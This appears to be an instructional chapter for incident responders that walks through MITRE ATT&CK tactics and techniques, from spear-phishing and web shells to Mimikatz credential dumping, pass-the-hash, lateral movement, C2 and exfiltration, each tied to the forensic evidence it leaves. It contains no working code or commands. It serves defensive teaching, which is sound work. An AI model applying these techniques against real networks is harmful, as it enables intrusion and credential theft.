Common Attack Techniques and Tactics, Techniques and Procedures

The three levels of TTP abstraction serve different audiences and different investigation tasks. Tactics are the highest level: they name the goal the attacker is pursuing at a given moment, such as gaining initial access, maintaining persistence after a reboot, or exfiltrating collected data. MITRE ATT&CK defines 14 tactics for enterprise environments. Knowing which tactic you are dealing with tells you what kind of evidence to look for.

Techniques are one level down: they specify how the tactic is achieved. The tactic Initial Access has 10 associated techniques including Phishing (T1566), Exploit Public-Facing Application (T1190), and Supply Chain Compromise (T1195). Each technique may have sub-techniques. Phishing has three sub-techniques: spear-phishing via attachment (T1566.001), via link (T1566.002), and via service such as social media (T1566.003). Knowing the technique tells you which specific log sources and artefacts to examine.

Procedures are the most granular level: they describe a specific, observed implementation used by a particular actor or tool. The procedure might be 'APT29 used a password-protected ZIP attachment containing a .lnk file that, when executed, ran a PowerShell command to download a second-stage payload from a compromised website.' Procedures are threat-intelligence outputs: they appear in incident reports, vendor advisories, and law enforcement disclosures. They connect abstract techniques to the real forensic artefacts left by specific campaigns.

The most common initial access technique observed across criminal and nation-state intrusions is phishing, specifically spear-phishing. Unlike bulk phishing, spear-phishing is crafted for a target. The attacker researches the target's organisation, role, current projects, and professional contacts before composing the lure. The email typically comes from a domain that closely resembles a trusted sender, or from a legitimately compromised account. Attachments exploit document rendering vulnerabilities or carry macros that execute on opening. Links lead to attacker-controlled pages that harvest credentials or trigger drive-by downloads.

The second most common initial access technique is exploitation of public-facing applications (T1190). Vulnerabilities in web applications, VPN concentrators, email gateways, and remote desktop services are exploited before the vendor has released a patch (zero-day) or after a patch is available but before the organisation has applied it (N-day). The 2021 Microsoft Exchange ProxyLogon vulnerabilities and the 2023 MOVEit Transfer SQL injection vulnerability both resulted in mass exploitation within days of public disclosure, affecting thousands of organisations across multiple countries.

Supply chain compromise (T1195) is a third route: the attacker compromises a trusted software supplier and embeds malicious code into a legitimate update. The 2020 SolarWinds SUNBURST campaign distributed malicious code to approximately 18,000 organisations via a signed software update. The attack bypassed perimeter controls because the malicious binary arrived as a trusted vendor update with a valid digital signature.

After gaining access, attackers execute code to establish a foothold. The most common execution techniques rely on interpreters already present on the target system: PowerShell (T1059.001), Windows Command Shell (T1059.003), and Unix shell scripts. This is the living-off-the-land approach. Because PowerShell and cmd.exe are legitimate system binaries, their execution does not by itself indicate compromise. Investigators must look at what those interpreters were told to do: command-line arguments, downloaded files, outbound connections initiated, and processes spawned.

Persistence techniques ensure the attacker retains access after reboots, password changes, or partial remediation. Common methods include: Registry Run Keys and Startup Folder entries (T1547.001), which cause malicious executables to run at every logon; Scheduled Tasks (T1053.005), which execute malicious code at specified times or intervals; service installation (T1543.003), which registers malicious binaries as Windows services; and web shells (T1505.003), which place attacker-controlled code on a web server so that the attacker can reconnect via HTTP even after a VPN credential is revoked.

Web shells deserve separate attention because they are particularly common in incidents originating from web application exploitation. A web shell is a small script, often a single PHP or ASPX file, that accepts commands from the attacker via HTTP parameters and executes them on the server. They are difficult to detect because their traffic resembles legitimate web requests. Investigation requires reviewing web server file creation timestamps, comparing current files to known-good baselines, and searching for files with unusual permission settings or code patterns consistent with command-execution logic.

Credential dumping (T1003) is the most consequential technique in many intrusions because it converts a low-privilege foothold into the ability to authenticate as any user on the network. On Windows systems, the LSASS (Local Security Authority Subsystem Service) process holds authentication material in memory including NTLM password hashes and Kerberos tickets. Tools such as Mimikatz access LSASS memory directly via the Windows debugging API or by reading a memory dump of the LSASS process. The sekurlsa::logonpasswords module extracts hashes and, in some configurations, cleartext passwords stored by Windows Credential Provider.

Pass-the-hash (T1550.002) and pass-the-ticket (T1550.003) are follow-on techniques that use dumped credentials without cracking them. In pass-the-hash, the attacker injects a captured NTLM hash directly into an authentication session, authenticating as the victim user without knowing the password in plaintext. In pass-the-ticket, a captured Kerberos ticket-granting ticket (TGT) is injected into the current session, granting access to all services the original user was entitled to access. Both techniques generate authentication events in Windows Security event logs, but the events appear as legitimate authentications from the victim account, not from the attacker.

Privilege escalation uses vulnerabilities or configuration weaknesses to move from a standard user account to an administrator or SYSTEM account. Common techniques include exploitation of unpatched local privilege escalation vulnerabilities, abuse of misconfigured service permissions (where a low-privilege user can replace a service binary), and token impersonation (T1134), where the attacker captures the access token of a higher-privilege process and impersonates it. On Linux systems, SUID binary abuse and sudo misconfiguration are analogous paths.

Lateral movement is the phase where an attacker moves from the initially compromised system to other systems of interest on the network. The primary goal is to reach high-value targets: domain controllers, database servers, file shares containing sensitive data, or endpoints belonging to privileged users. Lateral movement is often the longest phase of an intrusion and generates the most forensic evidence because it involves authentication events, file transfers, and remote process execution across multiple systems.

Remote Services exploitation (T1021) covers several sub-techniques. Remote Desktop Protocol (RDP, T1021.001) is frequently abused because it provides a full interactive session on the target system. SMB and Windows Admin Shares (T1021.002) allow file transfer and remote execution using dumped credentials. Windows Management Instrumentation (WMI, T1047) allows remote process execution via a legitimate management protocol that many organisations do not monitor closely. PsExec, a legitimate Sysinternals administration tool, is used to run commands on remote systems by creating a temporary service; it leaves distinctive artefacts in Windows service installation logs and the ADMIN$ share.

Discovery techniques (T1082, T1083, T1018, T1087) precede lateral movement: the attacker enumerates the network, lists active hosts, queries Active Directory for user accounts and group memberships, and identifies high-value targets before moving. Common tools include native Windows commands such as net user, net group, nltest, and ping sweeps using built-in utilities. These commands leave traces in process creation logs (Windows event ID 4688 with command-line auditing enabled) and in PowerShell script block logs.

Command and control (C2) channels allow the attacker to receive outputs from compromised systems and send new instructions. Attackers prefer C2 protocols that blend with legitimate traffic. HTTPS to attacker-controlled domains is the most common approach because it is encrypted and resembles normal web browsing. More sophisticated actors use DNS-over-HTTPS tunnelling (T1071.004), where commands and responses are embedded in DNS queries and answers, making the traffic nearly indistinguishable from routine DNS lookups. Some actors use legitimate cloud services including Google Drive, Dropbox, and GitHub as C2 channels, a technique classified as Web Service (T1102).

Exfiltration techniques transfer collected data to attacker-controlled infrastructure. The most common method is exfiltration over the C2 channel itself (T1041), which avoids creating additional outbound connection patterns. Large-volume exfiltration may use dedicated tools that compress and encrypt data before transfer. Investigators look for unusual outbound data volume to unfamiliar destinations, DNS queries for newly registered domains, and scheduled or automated file transfers at off-hours. Forensic artefacts may include archive files created just before exfiltration, tool binaries in temporary directories, and evidence of data staging in locations accessible to multiple systems.

Defence evasion is the collection of techniques used to avoid detection throughout the intrusion. Key approaches include: indicator removal (T1070), where attackers delete event logs, clear bash history, or remove artefacts; timestomping (T1070.006), where file modification times are altered to disrupt timeline analysis; process injection (T1055), where malicious code is injected into the memory space of a legitimate process such as explorer.exe or svchost.exe to hide its presence; and obfuscated commands (T1027), where PowerShell or cmd.exe commands are encoded in Base64 or broken across multiple variables to avoid signature-based detection. Incident response and malware analysis workflows, covered in depth in the Malware Taxonomy topic, provide the tools to unpack and analyse these evasion artefacts.